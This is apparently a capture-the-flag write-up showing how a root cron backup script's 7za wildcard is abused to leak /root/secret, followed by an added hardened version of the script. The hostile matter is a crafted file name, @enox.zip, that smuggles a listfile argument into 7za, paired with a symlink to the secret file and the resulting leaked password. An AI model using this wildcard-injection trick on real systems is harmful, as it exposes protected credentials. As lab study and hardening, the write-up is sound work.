Cron


There is a system-wide cron job that runs the command bash /opt/backup.sh. This was enumerated by PEAS as well.

www-data@zipper:/opt$ ll
total 16K
4.0K drwxr-xr-x  2 root root 4.0K Apr  6 14:12 backups
4.0K drwxr-xr-x  3 root root 4.0K Aug 12  2021 .
4.0K -rwxr-xr-x  1 root root  153 Aug 12  2021 backup.sh
4.0K drwxr-xr-x 20 root root 4.0K Aug 12  2021 ..
 
 
www-data@zipper:/opt$ cat backup.sh
#!/bin/bash
password=`cat /root/secret`
cd /var/www/html/uploads
rm *.tmp
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.log

The backup.sh script archives all the ZIP files in the /var/www/html/uploads directory using 7za, protecting the archive with the password read from /root/secret. The script also redirects the command output to the /opt/backups/backup.log file.

The issue lies in the wildcard, *.zip: the shell expands it into whatever file names exist in the uploads directory, and those names become arguments to 7za.

Vulnerabilities


According to an online resource, the wildcard, *, used with 7z (7za) can be abused to perform an arbitrary file read. Moving on to the privilege escalation phase.

/var/www/html/uploads


www-data@zipper:/opt$ ll /var/www/html/uploads
total 20K
4.0K drwxr-xr-x 2 www-data www-data 4.0K Apr  6 14:52 .
4.0K -rw-r--r-- 1 www-data www-data 2.7K Apr  6 14:51 upload_1743951079.zip
   0 lrwxrwxrwx 1 www-data www-data   12 Aug 12  2021 enox.zip -> /root/secret
   0 -rw-r--r-- 1 www-data www-data    0 Aug 12  2021 @enox.zip
4.0K -rw-r--r-- 1 www-data www-data  156 Aug 12  2021 upload_1628773085.zip
4.0K drwxr-xr-x 3 www-data www-data 4.0K Aug 12  2021 ..
4.0K -rw-r--r-- 1 www-data www-data   32 Aug 12  2021 .htaccess

Checking the /var/www/html/uploads directory reveals two interesting files:

  • @enox.zip
  • enox.zip

It would appear that there has been an exploit attempt.

Checking the official documentation of 7z reveals the @listfile feature: an argument beginning with @ is not treated as a file to add but as a listfile, a text file that names the files to process, one per line.

This means that when 7za is executed, the expanded argument @enox.zip makes it treat enox.zip as a listfile containing the names of the files it should compress. When 7za reads enox.zip it actually reads /root/secret, because enox.zip is a symlink to that file, and since the content is not a list of files, it throws an error that shows the content in the log.

/opt/backups/backup.log


www-data@zipper:/opt$ cat backups/backup.log
 
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor                 (A00F11),ASM,AES-NI)
 
Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 3327
 
Scanning the drive:
3 files, 2875 bytes (3 KiB)
 
Updating archive: /opt/backups/backup.zip
 
Items to compress: 3
 
 
Files read from disk: 3
Archive size: 3327 bytes (4 KiB)
 
Scan WARNINGS for files and folders:
 
WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1

Checking the /opt/backups/backup.log file shows that 7za attempted to scan for the files named by the @listfile, @enox.zip.

The warning line is particularly interesting. It appears that it was meant to read enox.zip : No more files, but instead 7za read the /root/secret file, because enox.zip is a symlink to it. This would mean that WildCardsGoingWild is likely the content of the /root/secret file.

Validation


www-data@zipper:/var/tmp$ cp /opt/backups/backup.zip .
www-data@zipper:/var/tmp$ 7za x ./backup.zip -pWildCardsGoingWild
 
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=C.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor                 (A00F11),ASM,AES-NI)
 
Scanning the drive for archives:
1 file, 3327 bytes (4 KiB)
 
Extracting archive: ./backup.zip
--
Path = ./backup.zip
Type = zip
Physical Size = 3327
 
Everything is Ok
 
Files: 3
Size:       2868
Compressed: 3327
 
 
 
www-data@zipper:/var/tmp$ ll
total 24K
4.0K drwxrwxrwt  2 root     root     4.0K Apr  6 15:11 .
4.0K -rw-r--r--  1 www-data www-data 3.3K Apr  6 15:11 backup.zip
4.0K -rw-r--r--  1 www-data www-data 2.7K Apr  6 14:51 upload_1743951079.zip
4.0K -rw-r--r--  1 www-data www-data  156 Aug 12  2021 upload_1628773085.zip
4.0K -rwx------  1 www-data www-data   12 Aug 12  2021 enox.zip
4.0K drwxr-xr-x 14 root     root     4.0K Aug 12  2021 ..

It successfully extracted the content with the password WildCardsGoingWild.
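For comparison, a hardened version of backup.sh, written here as an added example (it is not the script found on the machine). It assumes the same paths as the write-up (/var/www/html/uploads, /root/secret, /opt/backups) and that cron invokes it as bash /opt/backup.sh run; the key change is that the file list comes from find instead of a shell glob, so symlinks are skipped and every argument starts with ./, which 7za can never read as a @listfile or a switch.

```shell
#!/bin/bash
# Hardened backup.sh (added example, not the machine's original file).
# Assumed paths follow the write-up; cron calls: bash /opt/backup.sh run
set -eu

UPLOADS="${UPLOADS:-/var/www/html/uploads}"
BACKUP_DIR="${BACKUP_DIR:-/opt/backups}"
SECRET_FILE="${SECRET_FILE:-/root/secret}"

# Emit the files to archive from directory $1, NUL-separated, as "./name".
# -type f (without -L) never matches a symlink, so enox.zip -> /root/secret
# is skipped, and the "./" prefix means no argument can begin with "@"
# (listfile) or "-" (switch), whatever a user names their upload.
zip_candidates() {
    ( cd "$1" && find . -mindepth 1 -maxdepth 1 -type f -name '*.zip' -print0 )
}

# Same rule for the cleanup step: the original "rm *.tmp" trusted the glob too.
remove_tmp_files() {
    ( cd "$1" && find . -mindepth 1 -maxdepth 1 -type f -name '*.tmp' -delete )
}

run_backup() {
    local password
    # The original log was world-readable, which is how the secret reached
    # www-data. umask 077 makes the new archive and log root-only.
    umask 077
    password="$(cat "$SECRET_FILE")"
    remove_tmp_files "$UPLOADS"
    cd "$UPLOADS"
    # xargs -0 keeps arbitrary names intact; -r skips 7za when there is
    # nothing to archive. "--" ends switch parsing, so only the switches
    # placed before it count. Residual risk: -p on the command line is
    # visible in the process list while 7za runs.
    zip_candidates . | xargs -0 -r 7za a "$BACKUP_DIR/backup.zip" -tzip \
        "-p$password" -- > "$BACKUP_DIR/backup.log" 2>&1
}

if [ "${1:-}" = run ]; then
    run_backup
fi
```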